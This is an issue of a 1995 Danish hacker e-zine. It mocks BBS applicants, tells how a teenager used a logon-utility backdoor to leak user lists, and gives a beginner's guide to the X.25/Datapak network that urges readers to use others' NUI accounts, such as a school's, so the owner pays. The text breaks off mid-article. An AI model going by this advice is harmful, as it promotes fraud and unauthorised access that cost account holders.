301603 Z SEP 1995
STARTEX

Dommedag Nu #4
- SMERSH -

DUMMESLAG TIL Deja-vu.......
Vores 3Lit3 SYSGUD p† PLAN B har gjort det igen. Da han, som den f›rste, fik
lagt sine klamme h‘nder p† en kopi af DDN#3 spredte han den som d›d og helvede,
hvilket er helt fint, det var faktisk meningen, men der er bare et lille pro-
blem. Problemet best†r i hans BBS add, som i dette tilf‘lde hed BEERS.EXE.
Problemet med BEERS.EXE var, at den var inficeret med QuickSilver virus'en, og
den blev s† spredt over det ganske land. Dette var godt nok ikke med vilje,
men stadigv‘k: DUMMESLAG TIL Deja-Vu..... [Dommen udf›rt den 11/9 1995 -red].

Men nu til noget helt andet. Velkommen til Dommedag Nu #4. Jeg/vi h†ber, at i
syntes om det, og spreder det som gale. Som s‘dvanligt vil vi gerne have noget
"feedback" p† magasinet, og vi kan kontaktes p† PLAN B, eller p† vores 3 Dist.
sites (se nedenunder). Vi har lagt m‘rke til, at folk fors›ger at komme i kon-
takt med os de m‘rkeligeste steder. Vi ringer ikke meget rundt, s† her kan du
f† fat p† f›lgende:
Saron - Rundt omkring, men ringer med meget forskellige intervaller.
Clive Sharp - H‘nger ud p† PLAN B, Darkside Connection og ingen andre steder!!!
Deja-Vu - Rundt omkring, ogs† p† de fleste st›rre WaR3z boards...
Narkobagmanden & 99papa er phreakere (og 3LiTe trashere (hmmm)) som ikke ringer
rundt, men de kan, hvis i vil snakke med dem, kontaktes gennem Saron, Clive
Sharp & Deja-Vu.

Vi mangler, som s‘dvanligt, noget materiale som vi kan smide i bladet, s† hvis
du har noget du mener der er interesseant, smid det op til os. ALT har inter-
esse, men vi kan ikke garantere at det kommer med i bladet. Jo mere teknisk
det er, jo bedre, men det er bestemt ikke noget krav, s† hvis du har en capture
fra dit sidste hack, eller noget andet i den genre, upload det til os (men s›rg
for at det ikke er FOR "belastende").

Nok fra mig, mu skal du bare nyde bladet....
- Clive Sharp

Medvirkende:

De 7 p† toppen: Redakt›r............... Pat Bateman
Eksklusiv skribent..... Saron
KTAS h‘vneren.......... Clive Sharp
L‘rlingen.............. Narkobagmanden
Helten................. 99papa
Den onde............... Darkseed
Logistik: SYSGUD................. Deja-vu
PLAN B................. 31220506

UAFD: Darkside Connection.... 45974344
Alien Staircase........ 31575188
Restricted Access...... 36703060

Og det l›se: Tak til................ Darkman , TorNado & Solaris
Farve af............... QEdit Advanced V3.00c SW
Tryk af................ Cannon LBP-4
Lagerplads............. Western Digital
Outside Broadcasting... Zitech 486/66 b‘rbar Motorola
Lyd.................... GravisUltraSound MAX
Musik.................. Frontline Assembly
Vi anbefaler........... BOMBJACK

Indholdsfortegnelse:

1. Livet p† PLAN-B.
2. Saga'en om Junker Jake.
3. X.25 for begyndere.
4. AT&T - En global organisation.
5. En Polymorphic Virus.
6. Hvad vil fremtiden bringe for Dommedag Nu?
7. CyberBug v. 1.00

Nyheder (taget, stort set, fra den Danske dagspresse).
Hackere Bustet!
Hackere anholdt. [Fra Ekstra-Bladet (suk!).]
R†d til Danske sysopper og brugerne af deres systemer.
Dansk Piratlinie oprettet. [Jyllands-Posten.]
Sv‘re tider for hackere. [ComputerWorld.]
Hackere ringer verden rundt p† andres Visa Dankort. [ComputerWorld.]
Se hackerens telefonnummer. [ComputerWorld.]
Sikkerhedshul i Netscape. [ComputerWorld].

þþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþ

Livet p† PLAN-B (Uden synd ingen frelse)
Af Clive Sharp & Deja-vu

1. Indledning
Efter vi bragte nummeret til PLAN-B i Dommedag Nu nr. 3, har vi f†et en
masse henvendelser. Mange af dem er fra folk der ved hvad de snakker om, men
desv‘rre er der ogs† en masse folk, som INTET ved om hacking. Dette er jo ikke
nogen synd, da vi alle skal starte fra et sted. Problemet er, at der er FOR
mange, der slet ikke har noget grundlag for at begynde at hacke. Det mest ide-
elle ville v‘re, at vi lod alle komme ind p† boardet, men det ville give os
(is‘r Deja-Vu) en uoverskuelig arbejdsopgave. S† for at skille de vidende fra
de "uvidende" har vi installeret nogle "sp›rgeskemaer" n†r man s›ger om optag-
else som ny bruger.
Disse "sp›rgeskemaer" har v‘ret grundlag for mange timers sjov, og nu
vil vi dele disse sjove oplevelser med alle jer. Bem‘rk venligst, at alle disse
svar er givet i FULDT ALVOR, hvilket g›r det ret sjovt. Alle navne er blevet
slettet, da vi ikke ›nsker at h‘nge nogen ud. Alt i [] er vores kommentarer. N†,
men lad os komme i gang.

2. PLAN B registering - Hacking

Hvor ligger de priviligerede porte p† TCP/IP:
þ Til venstre!?! [HVAD?!? Har du r›get???]

Hvad er Telnet port 25 og 79:
þ X.25 og X.79 [N‘ppe.]
þ Tele port 25 of 79. [Hvad ????]

Hvad er X.25:
þ Telenet standart. [Nope.]
þ Netw‘rk. [T‘t p†, men ikke helt korrekt....]
þ NUA connection (datapak). [hmmmmm...]

Hvad er .RHOSTS:
þ Telenet standart. [Nej......]

Hvad er en PAD:
þ Et tastatur. [Man tror det er l›gn.]
þ Password active destroyer. [Hvad er det?????]

Hvad er COPS:
þ Fedz. [Hvor dum kan man v‘re...]
þ Bad ones. [Ditto.]
þ Politi betjent. [Ditto.]
þ Politi??? [Ditto.]
þ Politi. [Ditto.]
þ En sysop. [Ok, m†ske er der en sysop der hedder COPS, men tror
du det er ham der bliver spurgt efter???]
þ Et program p† TV VestKysten [!!!!!]

Hvad er SATAN:
þ Div evil. [?!?!?!?]

Hvad er ideen bag en FIREWALL:
þ To protect system. [Det skal nok uddybes lidt..]
þ Man kan komme ind igen. [S† starter vi forfra igen.]
þ At beskytte sig. [Godt g‘ttet.]

Hvad er en NUI:
[Dette svarer de fleste rigtigt p†.]

Hvad er RSH:
[Dette svare de f‘rreste p†.]

Hvad er Crackerjack:
þ Et program. [Fedt....]
þ Hacker program. [Uddybes tak....]
þ Online password cracker. [Ikke helt....]

Hvad er CERT:
þ Hacker group. [Super lamerzz....]
þ En hacker gruppe. [Ditto.]
þ Hacker gruppe. [Ditto]

Hvem er CERT's Danske medlem:
[Kun 1 har svaret p† dette.]

Hvad er/var QSD:
þ D›dt. [hmmmmm.]
þ Et board. [Ikke helt rigtigt.]

Hvordan bruge man ICMP beskeder til egen fordel:
þ Well, send and recieve. [Hvad?!?!?]
þ L‘se dem. [Hvad ?!?!?!?]

Hvordan virker en ETHERNET SNIFFER:
þ Cops. [!?!?!?!]
þ Samler password. [Og hvad mere.....]

Hvad er nemt hvis TFTP er sat d†rligt op:
þ Hack. [Godt t‘nkt..., men m†ske lidt mere pr‘cist.]
þ At hacke sig ind. [Ditto.]
þ Hacke sig ind. [Ditto.]
þ At hacke shit'et. [Ditto.]
þ Hente filer der ikke er tilg‘ngelige. [Ditto.]

Hvad er en GOD/OD:
þ Ahmm Think it is a Sysop. [Det er n‘ppe det der bliver t‘nkt
p† i et hacking "sp›rgeskema", vel???].
þ Sysop. [Ditto].

3. PLAN B registrering - Phreaking

Hvilke Numrer BlueBoxer man altid over:
[Ganske f† svarer p† dette.]

Hvad er teorien bag BlueBoxing:
þ At ringe gratis. [M†ske lidt mere specifikt.]
þ At skabe frit lejde gennem nettet. [Frit lejde???]
þ At udsende en tone der forvirer systemet. [Nej..]
þ No pay (for da phreaker). [Godt t‘nkt..]
þ Hmm bb er det ikke det med lyd Hz. [Det er det nemlig..]
þ Ja man bruger en frekvens til at snyde tlf. [Nej nu bliver det
for teknisk...]
þ erhm PBX??? [B†tnakke].

Hvad er CCCIT 5:
þ Nogle seje gutter. [Tror han, at det er en gruppe?????]
þ Calling card. [Nej....]
þ Modem standart. [Hmmm, nope..]

Hvad er en PBX:
þ Dialout site. [Hmmm.]
þ Power box. [Hvad er det???]
þ Et sted som du ringer videre fra. [uhhh....]

Hvad er "Alliance conf.":
þ Phreaking. [Ikke just.]
þ A friendly one. [Hvad?!?!?!]

4. PLAN B registrering - Virus

Hvad er VCL:
þ Virus Clean. [N‘ppe.]
þ Program. [Godt g‘ttet.]
þ Virtuelt Clear Lockout. [Hvad?!?!?!]

Hvor'n virker en Polymorphic virus:
þ del‘ggende. [NNEEEJJJJ.]
þ Formaterer din HD. [Ditto.]

Hvem er Dark Avenger:
þ Frygtet. [Fedt...]
þ Hvis med i PWA... [Super Lamer!!]
þ Virus program. [Nej, nej, nej.]
þ En skummel fyr. [Fedt, og hvad mere???]
þ En Virus. [Nej.]

Hvad er 40HEX:
þ Ahmm.. Hex er hexa decimaler. [Det er n‘ppe det der bliver
spurgt om i et Virus area, vel??]
þ Langues. [?!?!?!?]
þ Program-tal. [Fedt!!]
þ Som related stuff.. [Godt g‘ttet.]
þ En virus. [Nej.]
þ The magic number of kilobytes a com file kan be. [Det er n‘ppe
det der bliver spurgt efter.]

5. "Brevet"
Man skal nu ikke tro, at "sp›rgeskemaerne" er det eneste vi bruger til
at vurderer en ny bruger, for det er det ikke. Vi har brugere, der ikke har
svaret p† et eneste sp›rgsm†l, og grunden hertil er, at hvis man har den rette
indstilling, s† kan man sagtens komme ind, selvom at man ikke har den helt
store viden om hacking. Herefter f›lger nogle af de breve vi har modtaget, fra
nye brugere. F‘lles for alle disse breve er:
1. Ingen af dem havde udfyldt et rimeligt antal sp›rgsm†l (eller
bare et!), og
2. ganske f† kom ind p† boardet (i s† tilf‘lde er de medtaget her,
pga. deres mere eller mindre morsomme breve).

6. Hvad De skrev

þ Well I'll leave this shit up to you.

þ jeg h†ber at vi kan udveksle mange gode crack's og warez
programmer. jeg har bland andete qmodem pro 2.0 for win95,
norton navigator for win95, windowscommander v1.61 *cracked*
m.m. please upgrade me!
[Er du sikker p†, at du har ringet det rigtige sted hen???
Det er vi IKKE!]

þ you need me!!!!

þ Ahm... Jeg er Faktsik Kun Elite... Ikke rigtig noget inden for
Virus eller hacking eller Phreak... SO...
H†ber jeg kommer ind... [3LiTe den her!!!]

þ Ahm... I HATE VIUS :) [I hate jou :) ]
Na... Jeg er kun en lille pirat Hacker ikke phreaker...
OG coder heller ikke virussersss
SEEEEES [yeps.. netop]

þ HVORFOR??????????????????????
Hvorfor er jeg ikke kommet ind igen???????
Jeg var p† DL-top10'en!!!!!!!! [!!!]
Jeg skrev meget!!!!!!!!!!!!!!! [Kvalitet frem for kvantitet!]
Hvad nu??? Hvad vil du ha'???????
PLEASE LET ME IN!!!!!!!!!!!!!!!!

þ Hi.. Tjjaa.. jeg jan sikkert svarre p† nogle af de sp›rsm†l.
men det er ville sikkert ikke v‘re rigtigt alligevel...
Det eneste jeg er interseret i er at Trade og Warez... s† jeg
t‘nkte at dette BBS ville v‘re som skabt for mig for at f† nye
MCI med mere..
Cya Later... [Vi HaR De$\/‘Rr3 ikk3 MCi'$ p B0aRd3t]

þ jeg ›nsker bare access til hacking program
[Maj mange hacking program har, dig ingen adgang!!]

þ SOM DU KAN SE ER JEG NEW USER OG OENSKER AXX PAA BOARDET.
DA DU HAR LAEST MIN REGISTRERING KAN DU SE AT JEG IKKE VED
MEGET OM H/P/A
I DET HELE TAGET MEN DET ER NETOP OGSAA GRUNDEN TIL AT JEG
OENSKER AXX, FOR AT LAERE OM DET SAA JEG KAN BLIVE BEDRE.
DERFOR HAABER JEG AT DU VIL GRANETE AXX TIL MIG. [Sl† lamer
tasten fra!]

þ Well, I stink can't help it, det er anden gang jeg har fyldt
ud, saa denne bliver vel ligesaa daarlig som den foerste -
aergeligt.. Well, Glad to stop by anyway.
[Tredie gang er lykkens gang!]

þ Hej Med dig.
Hvad fanden er det for nogle †ndsvage sp›rgsm†l?
Jeg troede jeg havde fundet en varm hacker bbs
og s† havner jeg i lykkehjulet
har jeg vundet noget?

þ hi deja-vu im sure i've seen you before he he
im not no elite and im sure not an enclypidia im afraid i could
not answer any of your ? maybe the 40hex if i calculatet i little
bit but i dont think that it would matter much anyway im sure
XXXXXXXX [Slettet -red] will say ok for me im uuping and
downing some warez sometimes well thats about it i guess.
[N†r man pr›ver at omregne 40h til decimal (og s† p† det eneste
sp›rgsm†l man besvarer), og ikke engang kan det, S ER MAN
PRESSET I BUND!!]

þ Hi there..
Kunne jeg komme ind her... or.. ?

þ hejsa jeg h†ber at jeg f†r access, da jeg er MEGET interassede
i at f† nogle nye spil & progs.....
[Nej men du kan ringe til DanBBS og sp›rg om du ikke kan blive
opgraderet til Elite Pirat Bruger!]

þ Give me access_! [Sut mig!]

7. Et sidste ord
Nogle vil m†ske syntes, at vi er temmeligt arrogante, og at vi ikke kan
tillade os, at h‘nge folk p† denne m†de. Til det vil svaret v‘re: N†r man har
ca. 1-2 nye brugere om dagen, s† bliver man temmeligt tr‘t af, at se p† folk
som ikke kan/gider at udfylde vores "sp›rgeskemaer", og n†r der nu engang imel-
lem kommer en rigtig WaR3z gut forbi, s† m† man sku' da kunne lave lidt sjovt
med dem, det er jo ikke kun fuldt alvor.
Under alle omst‘ndigheder, s† h†ber vi, at denne artikel har v‘ret lige
s† sjov at l‘se, som den var at lave.

þþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþ

Saga'en Om Junker Jake
------------------------
- Darkseed

Alt er blevet sagt, og alt bliver sagt, men hvad var grunden til at en dreng p†
14 †r kom ind, og hvad kom og kommer det til at betyde.

En lille ubetydelig "jeg er intet" fyr, havde tilf‘ldigvis p† ukendt m†de,
fundet ud af, at der var en backdoor i Vigilantes S-Logon Utility til PCboard
der gav mere eller mindre access til at kunne fx. hente et boards Userliste,
s† han gav sig UDEN at t‘nke, igang med 2 boards (Dyers Eve samt Travelogue)
som han s† fik deres Userlister ud af, lidt tid gik s†, hvor Junker Jake s†
misbrugte nogle forskellige accounts, downloadede osv.

Nu gik det f›rst galt, Junker Jake releasede nu de 2 Userlister over mange
Elite boards, der derefter fik tr‘dem›llen til at tr‘de rundt, medf›lgene i
arkivet var f›lgene tekst fra Junker Jake.:

Yo!, Her er en besked til alle i denne skide lamme "scene" kaldet dk :

%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\
Efter at have blevet taget i farten med at have det sjovt, har jeg
besluttet mig at stoppe i scenen nu. Den rigtige historie er nok at
jeg hackede nogle Boards, folk blev sure, selv om jeg ikke gjorde
nogen skade. Udover at misbruge deres accounts for at downloade.
S† det var det, jeg stopper! Det var meget sjovt og jeg putter det
hele bag mig nu, og f†r et liv uden Teledanmarks telefonregning.
Jeg vil bare sige tak til alle de mennesker jeg har chattet mig,
tradet osv. Og jeg er specielt ked af at misbruge Bionics account,
men det var meget sjovt p† Velvet Underground :) tja jeg er ked af
det, men det er jo hvad der sker. Men ok alt hvad jeg fik ud af det
var nogle chips, lidt Cola, nogle Userlists osv. Jeg er totalt
ligeglad, med de Userlists, s† her er de :) jeg r†der alle der er
listet i disse Lister, at ‘ndre deres Passwords, Tlf.nummere osv.
%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\

Ses, Junker Jake / =[>ALPHA FLiGHT<]=

En ting som Junker Jake skrive, som jeg bed m‘rke i f›rst, var s‘tningen

> Men det er jo hvad der sker.

Jeg vil efter sk›n sige at dette ikke er hvad der sker, da selve "scenen"
ikke er interesseret i at skade sig selv. Det har hidtid ikke v‘ret et
problem, men en stadig stigene m‘ngde af "unge" folk ses stadig at komme
ind i scenen - Disse mennesker eller b›rn, har ingen efaring, og kender ikke
de (U)-skrevne love i scenen, ganske simpelt fordi de ikke har v‘ret l‘nge
nok i scenen til at kunne l‘re det - Men stadig er det ingen undskyldning,
overhovedet ikke, for de burde ikke v‘re her, medmindre de er helt indforst†et
med hvad den s†kaldte "scene" er for noget...... Men tilbage til emnet.

Efter filerne var blevet spredet godt rundt, begynder det f›rst at se sort ud
for Junker Jake, alle flamede ham (og g›r det stadig), nogle folk har v‘ret
ude p† hans private adresse for at l‘re ham ordet "VOLD", dette mislykkes da
han ikke var hjemme, men en seddel var blevet lagt til ham, og Junker Jake
skyndte sig s† at ringe til en af dem, hvorefter han fik en telefon-svarer,
det sagde Junker Jake s† at han havde h›rt at nogle havde v‘ret ude hos ham
for at banke ham, og han var ked af det, samt at han havde smidt Userlisterne
v‘k igen.. [Denne sampel ligger ogs† i Zip filen, samt en player -red].

Dette hjalp dog ikke, en anden person ringede til Junker Jake for at tale med
ham, hvorefter han br›d sammen og gr‘d - efter ca. 1000 t†rer tilb›d han s†
at betale for en ny oprettelse af en linie, samt nogle andre ting.

-----

Indtil dette har det v‘ret temmelig umuligt, for PHG (Politiets Hacker Gruppe)
at ramme scenen, men efter Pharzyde Bust, begynder de sorte tider at kikke
frem, politiet har, som skrevet i en anden artikel, alle stederne hvor
Pharzyde har ringet hen - Og af en af mine p†lidlige kilder har jeg f†et at
vide at "Travelogue" allerede er lukket.

Jeg vil liges† r†de folk der er i "scenen" at de passer lidt p† med hvad de
g›r i det n‘ste stykke tid, da "scenen" ikke er s† sikker som den har v‘ret.
Vi skal selvf›lgelig huske at takke Junker Jake for at der nok kommer mange
Busts i denne tid....

þþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþ

X.25 for begyndere
Af Clive Sharp

1. Hvad er X.25
X.25 er i Danmark ogs† kendt som Datapak, og er en internationalt
netv‘rk, som var et af de st›rste netv‘rk inden Internettet blev trendy. Det er
forbundet med mange andre mere eller mindre bizarre netv‘rk i rigtigt mange
lande, og som eksempler kan n‘vnes SprintNet, TymNet o.s.v. Der findes GateWays
p† X.25, dvs. at man kan f.eks. komme p† Internettet ved at k›re gennem X.25.
Man kan selvf›lgeligt ogs† bare hacke en maskine p† X.25, der har forbindelse
til Internettet, og s† k›re gennem der. Men den bedste ting ved X.25 er:
DET ER GRATIS AT RINGE TIL!!!!!

2. Historien bag X.25 (MEGET KORT)
Den teknologi der bruges p† X.25 idag stammer, i bund og grund, fra
1968, hvor ARPANET kom op at k›re. Ide‚n bag X.25 er Packet Switching, som er
bygget op p† denne m†de (MEGET forenklet):

þ Al data bliver sendt i pakker, som er opbygget p† denne m†de:
þ Pakken har ‚n bestemt l‘ngde.
þ Pakken har adressen p† modtageren (logisk nok).
þ Pakken har et nummer, s† man kan bestemme r‘kkef›lgen
hos modtageren (de ville nok ikke v‘re s† smart, hvis
pakkerne kom p† denne m†de: 1,3,2,4,6,9,111,10 o.s.v,
det er selvf›lgeligt et krav, at pakkerne kommer som:
1,2,3,4,5,6,7,8,9,10 o.s.v.).

Stedet hvor al data'en bliver delt op i pakker (og sat sammen i pakker)
er en PAD. PAD betyder Packet Assembler/Disassembler, og det er den man logger
ind p† i vores tilf‘lde.

3. Hvordan logger man p†
For at logge p† skal du g›re f›lgende:

þ Ring 171 (Det er gratis!!)
þ N†r du har f†et en connect, s† sker der ikke noget...
Du skal nu trykke : go (uden return).
þ P† sk‘rmen st†r der nu:
DATAPAK X.28 SERVICE
PAD-ID : HIPC_
PORT-NO : 28
ENTER NUI ->

Her begynder det at blive sp‘ndende. De f›rste 3 linier har ikke den
store interesse i vores tilf‘lde (grunden til at der st†r X.28 er, at X.28 er
den protokol som bruges mellem terminalen og PAD'en, mens X.25 er den protokol
som bruges til kommunikation "internt" p† nettet) men den sidste linie er
enormt interesseant. Da jeg sagde, at det var gratis at bruge X.25 l›j jeg
lidt. Det er gratis at ringe op, men s† skal man opgive et nummer, hvor ens
forbrug skal krediteres. Dvs. at den person/firma hvis nummer man bruger f†r
regningen (temmeligt fikst, ikke sandt ?!). Et s†danne nummer hedder en NUI,
Network User Id, og er opbygget p† denne m†de:

þ XYYYYYYYZZZZZZZZ
X= Et bogstav, bestemt af TeleDanmark.
Y= Nogle tal, bestemt af TeleDanmark.
Z= Tal eller bogstaver, bestemt af kunden.

Hvis du s† har indtastet en gyldig NUI i linie 4 (se ovenover), frem-
kommer en [*], og s† er du parat til at g† amok p† nettet.
Men lad nu v‘re med at sidde og pr›ve at "g‘tte" en NUI, for det VIL
blive opdaget af TeleDanmark. Istedet s† check din skoles computer (forudsat at
du g†r i skole), for der er temmelig stor sandsynlighed for, at skolen har
Datapak adgang, og s† kan du jo bare lade skolen betale dine "udflugter" :).

4. Simple funktioner
Men f›r du kan begynde dit super-vilde-hacker-g†-amok-trip p† nettet,
s† skal du lige vide lidt mere om hvordan det virker. Det f›rste du skal vide
noget om, er en(et??) NUA. NUA betyder Network User Address, og er bygget op p†
denne m†de:

þ 023421920100401
³³ ³³ ³³ ³
³ÀÂÄÙÀÄÂÄÙÀÄÂÄÙ
³ ³ ³ ³
³ ³ ³ ÀÄÄÄÄÄÄÄÄÄÄ Netv‘rk adresse (variabel l‘ngde, men
³ ³ ³ standarten er 5 eller 3).
³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Omr†de pr‘fix (l‘ngden ligger, s†vidt
³ ³ jeg ved, fast p† 5).
³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ DNIC (Data Network Identification Code)
³ L‘ngden ligger fast p† 4. DNIC bruges
³ til at identificere hvilket netw‘rk man
³ er p†, og hvilket land det ligger i.
³ Se punkt 6.
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 0 bruges hvis man ringer til en NUA der
ligger i samme land, som den PAD man
bruger, hvis man ringer udenlands, skal
man bruge 9 istedet.

Der findes en masse dejlige funktioner p† Datapak, men her vil jeg nu
kun gennemg† en, nemlig CON. CON bruges til at f† forbindelse til en anden com-
puter p† nettet (CONnect). Dvs. at hvis jeg vil i forbindelse med en computer
med NUA'en 23421920100401, s† skal jeg skrive:

þ *con 923421920100401
³³ ³ ³³ ³
³ÀÂÙ ³ÀÄÄÄÄÄÂÄÄÄÄÄÄÙ
³ ³ ³ ³
³ ³ ³ ÀÄÄÄÄÄÄÄÄÄÄ Vores NUA.
³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 9 fordi vi ringer udenlands.
³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Vores CONnect kommando.
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Datapac er parat.

S† vil Datapac svare med at gentage linien (uden *), og efter et par
sekunder skulle man kunne se: Login (eller hvad man nu har f†et fat i).
Det skal dog lige n‘vnes, at man ikke beh›ver at skrive con, da dette
vil udf›re pr‘cis samme job: *923421920100401.
Overst†ende NUA er forresten noget der hedder CAMPUS 2000, og det er et
slags chat system for skoler o.s.v. Personligt syntes jeg, at det er noget
‘kelt skod, men s†dan er der s† meget....

5. Menu'en
Men Datapak har ogs† en menu, som man kan lege rundt med. For at komme
"ind" i menuen skal man bare skrive (n†r "*" er der): menu. S† kommer man ind i
PAXNET PUBLIC PAD COMMAND MENU. Jeg vil ikke gennemg† menuen, da den er temme-
ligt selvforklarende, dog skal der lyde en lille advarsel fra mig: Pas p† med
at rode ved ting du ikke kender noget til! Der er muligheder nok til at du kan
br‘nde dine fingre, med det resultat, at din NUI lider en brat d›d....

Men hvis du absolut vil rode med den slags ting, s† pr›v at tast "?"
(n†r "*" er der), s† f†r du nogle settings du kan lege med. Personligt kan jeg
ikke bruge dem til noget, men m†ske kan du.

6. Hvilket land/netw‘rk er det?
F›lgende liste er stj†let fra The Dark Council's tekst om DataPAC
(brugt i: The Canadian Hacker's Bibel). Listen er rimeligt gammel (omkring
1990) s† den er IKKE komplet, men jeg har ikke set nogle nyere update's, s† det
er hvad i f†r.

þ Land Netv‘rk's Navn DNIC
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Andora ANDORPAC 2945
Antigua AGANET 3443
Argentina ARPAC 7220
ARPAC 7222
strig DATEX-P 2322
DATEX-P TTX 2323
RA 2329
Australien AUSTPAC 5052
OTC DATA ACCESS 5053
AUSTPAC 5054
Bahamas BATELCO 3640
Bahrain BAHNET 4263
Barbados IDAS 3423
Belgien DCS 2062
DCS 2068
DCS 2069
Bermuda BERMUDANET 3503
Brasilien INTERDATA 7240
RENPAC 7241
RENPAC 7248
RENPAC 7249
Cameroon CAMPAC 6242
Cayman ›erne IDAS 3463
Chad CHAD 6222
Chile ENTEL 7302
CHILE-PAC 7303
VTRNET 7305
ENTEL 7300
Kina PTELCOM 4600
Colombia COLDAPAQ 7322
Costa Rica RACSAPAC 7120
RACSAPAC 7122
RACSAPAC 7128
RACSAPAC 7129
Cypern CYTAPAC 2802
CYTAPAC 2807
CYTAPAC 2808
CYTAPAC 2809
Danmark DATAPAK 2382
DATAPAK 2383
Djibouti STIPAC 6382
Dom. rep. UDTS-I 3701
Egypten ARENTO 6020
Finland DATAPAK 2441
DATAPAK 2442
DIGIPAK 2443
Frankrig TRANSPAC 2080
NTI 2081
TRANSPAC 2089
TRANSPAC 9330
TRANSPAC 9331
TRANSPAC 9332
TRANSPAC 9333
TRANSPAC 9334
TRANSPAC 9335
TRANSPAC 9336
TRANSPAC 9337
TRANSPAC 9338
TRANSPAC 9339
Fr. Antiller TRANSPAC 2080
Fr. guiana TRANSPAC 2080
Fr. Polynesien TOMPAC 5470
Gabon GABONPAC 6282
Tyskland DATEX-P 2624
DATEX-C 2627
Gr‘kenland HELPAK 2022
HELLASPAC 2023
Gr›nland KANUPAX 2901
Guam LSDS-RCA 5350
PACNET 5351
Guetamala GUATEL 7040
GUATEL 7043
Hondura HONDUTEL 7080
HONDUTEL 7082
HONDUTEL 7089
Hong Kong INTELPAK 4542
DATAPAK 4545
INET HK 4546
Ungarn DATEX-P 2160
DATEX-P 2161
Island ICEPAK 2740
Indien GPSS 4042
Indonesien SKDP 5101
Ireland EIRPAC 2721
EIRPAC 2724
Israel ISRANET 4251
Italien DARDO 2222
ITAPAC 2227
Elfenbens kyst. SYTRANPAC 6122
Jamaica JAMINTEL 3380
Japan GLOBALNET 4400
DDX 4401
NIS-NET 4406
VENUS-P 4408
VENUS-P 9955
VENUS-C 4409
Korea Rep. DACOM-NET 4501
DNS 4503
Kuwait BAHNET 4263
Libanon SODETEL 4155
Luxenbourg LUXPAC 2704
LUXPAC 2709
Macau MACAUPAC 4550
Maylasia MAYPAC 5021
Mauritius MAURIDATA 6170
Mexico TELEPAC 3340
Morokko MOROCCO 6040
Holland DATANET-1 2040
DATANET-1 2041
DABAS 2044
DATANET-1 2049
N. Mariana PACNET 5351
New Caledonia TOMPAC 5460
New Zealand PACNET 5301
Niger NIGERPAC 6142
Norge DATAPAC TTX 2421
DATAPAK 2422
DATAPAC 2423
Panama INTELPAQ 7141
INTELPAQ 7142
Peru DICOTEL 7160
Philipinerne CAPWIRE 5150
CAPWIRE 5151
PGC 5152
GMCR 5154
ETPI 5156
Portugal TELEPAC 2680
SABD 2682
Puerto Rico UDTS 3300
UDTS 3301
Qatar DOHPAC 4271
Reunion (Fr.) TRANSPAC 2080
Rwanda RWANDA 6352
San Marino X-NET 2922
Saudi Arabien ALWASEED 4201
Senegal SENPAC 6081
Singapore TELEPAC 5252
TELEPAC 5258
Syd Afrika SAPONET 6550
SAPONET 6551
SAPONET 6559
Spanien TIDA 2141
IBERPAC 2145
Sverige DATAPAK TTX 2401
DATAPAK-1 2402
DATAPAK-2 2403
Schweitz TELEPAC 2284
TELEPAC 2289
Taiwan PACNET 4872
PACNET 4873
UDAS 4877
Thailand THAIPAC 5200
IDAR 5201
Togolese Rep. TOGOPAC 6152
Tortola IDAS 3483
Trinidad DATANETT 3745
TEXTET 3740
Tunesien RED25 6050
Tyrkiet TURPAC 2862
TURPAC 2863
IDAS 3763
Foren. arabiske.EMDAN 4241
EMDAN 4243
TEDAS 4310
Uruguay URUPAC 7482
URUPAC 7489
Rusland IASNET 2502
Jomfru erne UDTS 3320
England IPSS-BTI 2341
PSS-BT 2342
MERCURY 2350
MERCURY 2351
HULL 2352
Jugoslavien YUGOPAC 2201 (N’PPE OPPE!!!)
Zimbabwe ZIMNET 6482

7. Konklusion
Jeg h†ber, at denne artikel har hjulpet dem af jer, som ikke vidste
hvad Datapak var. Alle dem der har v‘ret p† Datapak f›r har sikkert ikke f†et
noget ud af denne tekst, men det var nu heller ikke meningen. Hvis i finder
nogle fejl (dem er der sikkert et par stykker af), s† l‘g post til mig p†
PLAN B, hvilket (stort set) er det eneste sted jeg "kommer" ( ÄÄ hmmmm).......

þþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþ

AT&T - EN GLOBAL ORGANISATION
-------------------------------
- Darkseed

AT&T betyder for mange kommunikation, og i stort omfang er dette ogs† rigtigt,
men hvad er en eventuel konsekvens af en verdensomsp‘ndt koncern, der med tiden
bliver st›rre og st›rre - Hvilken effekt kan det f† vis kun en koncern f†r
tilstr‘kkelig magt, til at styre hele jordens kommunikations-net. Som s† mange
har lagt m‘rke til, g‘lder f›lgene regel :
'DEN DER KONTROLLERE KOMMUNIKATIONEN KONTROLLERE VERDEN'..

AT&T's f›rste bygning ligger tilbage til 1882, hvor de †bnede en afdeling i
Antwerp, Belgien, hvorefter de brugte de n‘ste 40 †r med at †bne afdelinger og
l‘gge telefon-linier ud i Europa, Asien samt Afrika. Allerede dengang blev det
besluttet at de ikke skulle have for meget magt, s† i 1925 solgte de deres
fremstilling af telefoner til andre lande (ITT-System), Hvor AT&T s† rettere
deres interesse for den Universale telefon service i USA, men forsatte dog
stadig deres lang-distance service, til andre lande, hvorefter de i 70'eren
fornyede deres internationale aktiviteter - i 1980, annonceret AT&T s† igen at
de ville g† igang igen med styring af den globale verdens kommunikation.

Tilbage i 1991 fik AT&T 24% af deres inkomst fra det internationale marked,
hvilket de dengang sp†ede til at i †r 2000, ville det v‘re oppe p† 50 %. AT&T
